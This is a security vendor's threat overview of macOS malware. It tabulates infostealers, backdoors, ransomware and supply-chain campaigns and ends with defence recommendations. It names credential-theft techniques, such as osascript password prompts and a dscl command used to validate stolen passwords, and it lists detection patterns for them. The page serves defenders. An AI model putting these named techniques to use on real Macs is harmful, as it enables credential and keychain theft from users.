Emsisoft 
Mac Specific Threats and Analysis
Despite macOS’s strong security reputation, the platform is increasingly targeted by sophisticated and diverse threats. The adaptation of malware to newer Apple hardware security features, such as the M1 and M2 chips, signals a growing and serious risk. The macOS threat landscape is characterised by the industrialisation of malware through Malware-as-a-Service (MaaS) offerings and the use of cross-platform frameworks like Go and Rust.
Information Stealers (Infostealers)
Infostealers remain the most widespread threat to macOS. Their primary goal is to harvest sensitive data, and recent evolutions leverage advanced social engineering and the abuse of common user behaviours to bypass built-in security like Gatekeeper.
Technical Analysis and Notable Examples
| Threat Family | Technical Details | Distribution/Infection Vector |
| Atomic Stealer (AMOS) Family | Prolific in 2024, with variants like Poseidon (aka Rodrigo) and Cuckoo. They exploit AppleScript (osascript) by using hidden answer parameters to trick users into revealing their macOS password, which then unlocks the Keychain for credential theft. Newer variants use encrypted strings and remotely loaded AppleScript for evasion. | Heavily relies on malvertising (Google/Bing ads) and malicious GitHub repositories, often leading users to execute malicious one-line Terminal commands that bypass Gatekeeper. |
| Banshee | Observed in 2024/2025, capable of bypassing Apple’s XProtect. It validates user passwords using the dscl /Local/Default -authonly command and employs anti-analysis checks (e.g., avoiding Russian-language systems). Targets Keychain, browsers, and wallets. | Deployed through MaaS, often disguised as legitimate apps like Obsidian. |
| PyStealer | Python-based infostealer (observed 2024). Conducts extensive anti-VM checks and uses AppleScript for password prompts. Exfiltrates data via Discord Webhooks and remote servers. | Distributed via disk images disguised as PDF documents. |
| Cthulhu Stealer | Go-based MaaS infostealer (observed 2024). Steals credentials, cryptocurrency, and game accounts. Requires users to override Gatekeeper warnings. | Spread through fake applications (e.g., CleanMyMac, Adobe GenP). |
| CloudChat Infostealer | Go-based stealer (observed 2024). Performs geolocation checks to avoid Chinese systems. Features clipboard monitoring to swap crypto keys and data exfiltration via FTP and Telegram bots. | Distributed via a fake video meeting app (CloudChat). |
| FrigidStealer | Focuses on stealing browser credentials and session cookies. | Typically spread through fake software downloads. |
Backdoors and Trojans
Backdoors and Trojans provide attackers with persistent, covert access or deceive users into installing malware, creating a foothold for more extensive compromise. The trend of writing backdoors in cross-platform languages (Rust/Go) simplifies multi-platform targeting.
Technical Analysis and Notable Examples
| Threat Category | Threat Family/Name | Technical Details | Infection Vector |
| Backdoors | RustDoor (aka ThiefBucket) | A sophisticated backdoor, written in Rust, simplifies cross-platform development. Linked to ransomware groups (2024). | Delivered via trojanized applications. |
| SpectralBlur | Backdoor linked to a North Korean APT (Advanced Persistent Threat) group. Offers upload, download, and execution functionality for surveillance. | Delivered via trojanized applications or downloaders. | |
| HZ RAT | Grants attackers full remote control (Remote Access Trojan) over infected systems. | Commonly delivered as a payload from a downloader. | |
| ZuRu | A new variant was found hiding inside a trojanized version of the legitimate app Termius. Bypasses Gatekeeper by exploiting user trust and requiring a manual security override. | Trojanized application. | |
| Trojans | Shlayer Trojan | A widely distributed Trojan. Its function is to download and execute other malicious payloads. | Distributed via fake software updates or malicious websites. |
| XcodeSpy | A Trojan that embeds in tampered Xcode projects, specifically targeting software developers. It creates a persistent backdoor. | A malicious Xcode project was shared among developers. | |
| RustBucket | A sophisticated backdoor trojan (2023) that bypassed Gatekeeper using a fake PDF app. Allowed for additional malware installation and spying. | Disguised as a fake PDF application. |
Ransomware
While historically less common, ransomware is evolving for macOS; cyber criminals can exploit the vulnerabilities and bypass the chip’s security measures of modern variants of Apple Silicon chips that can pose potential risks to users.
Technical Analysis and Notable Examples
| Threat Family/Name | Technical Details | Impact/Capability |
| NotLockBit (2024) | A macOS adaptation of the Windows LockBit variant. It demonstrated proof-of-concept capabilities for both file encryption and data exfiltration. Capable of bypassing Gatekeeper and exploiting vulnerabilities of M-series chips. | Encrypts files, demands ransom. Proof of concept on Apple Silicon. |
| EvilQuest (2020) | Combines file encryption with data theft. One of the more comprehensive early macOS ransomware threats. | Cripples operations, causes data breaches. |
| Albabat Ransomware (2025) | Evolved to target macOS in 2025, selectively encrypting files with specific extensions and leveraging legitimate tools to evade detection. | Targeted file encryption. |
| MacRansom (2017) | One of the first macOS ransomware families. | Demands Bitcoin payments for decryption. |
| KeRanger | Early notable macOS ransomware. | File encryption. |
Zero-Day Exploits and Supply Chain Attacks
These categories represent some of the most dangerous and evasive threats, often used in sophisticated, targeted campaigns.
Technical Analysis and Notable Examples
| Threat Category | Threat Family/Example | Technical Details | Impact |
| Zero-Day Exploits | CVE-2025-43300 | An out-of-bounds write vulnerability in Apple’s ImageIO framework. | Provides attackers with undetected access for extended periods, often triggered through maliciously crafted files (e.g., compromised images). |
| Supply Chain Attacks | EvasivePanda | A downloader campaign that infects users through compromised software or distribution channels. | Affects large groups of victims simultaneously by inserting a malicious payload into trusted software. |
| Shai-Hulud Worm | A supply chain attack targeting the npm ecosystem (2025). | Compromises applications that rely on the infected package. | |
| LightSpy | A cross-platform surveillance framework impacting macOS, iOS, Android, and Windows, often linked to Chinese APT groups. | Enables widespread surveillance and data exfiltration. |
Emerging and Advanced Threats
This category highlights new trends and vectors, including the role of AI and the use of native hardware features.
Technical Analysis and Notable Examples
Emsisoft Enterprise Security + EDR
Robust and proven endpoint security solution for organizations of all sizes. Start free trial| Threat Category | Threat Family/Example | Technical Details | Impact/Capabilities |
| AI-Driven Threats | N/A | AI automates the creation of polymorphic malware variants that can dynamically evade signature-based detection. It also powers highly convincing and effective phishing lures. | Increased success rates for social engineering and dynamic evasion of traditional security solutions. |
| M1/M2 Native Malware | Silver Sparrow (2021) | One of the first malware strains designed to run natively on Apple’s M1 chips. It used a fake Adobe Flash update and could execute remote commands. | Demonstrated the feasibility of native execution on Apple Silicon, initially infecting over 30,000 Macs. |
| Downloaders | CloudFake, RustyAttr, DPRK Downloader | These are first-stage loaders that are central to multi-layered campaigns. They establish an initial beachhead before downloading the final, more malicious payload (e.g., a backdoor or stealer). | Facilitate multi-stage attacks and make detection more challenging by separating the initial compromise from the final payload. |
Recommendations for Defense
The complexity of the current macOS threat landscape necessitates a mature, zero-trust security posture.
- System and Application Updates: Promptly applying patches is the single most effective way to mitigate risk, closing exploitable flaws like the one mentioned in CVE-2025-43300.
- Enhanced Endpoint Security (EDR): Deploy Endpoint Detection and Response (EDR) solutions with advanced behavioural analysis. These tools can detect suspicious activities such as:
osascriptcommands with hidden parameters (used by AMOS).
Unauthoriseddsclcommands for credential validation (used by Banshee/PyStealer).- Unexpected
curlrequests or binaries being executed from temporary directories (/tmp/).
- Proactive Threat Hunting: Security teams must actively look for Indicators of Compromise (IoCs), particularly suspicious
plistfiles being written to~/Library/LaunchAgents/to establish persistence. - User Training: User education is a critical defence layer. Employees should be trained to recognise and avoid:
- Malvertising and fake download sites.
- Suspicious dialogue boxes that prompt for system passwords.
- Executing Terminal commands copied from untrusted websites.
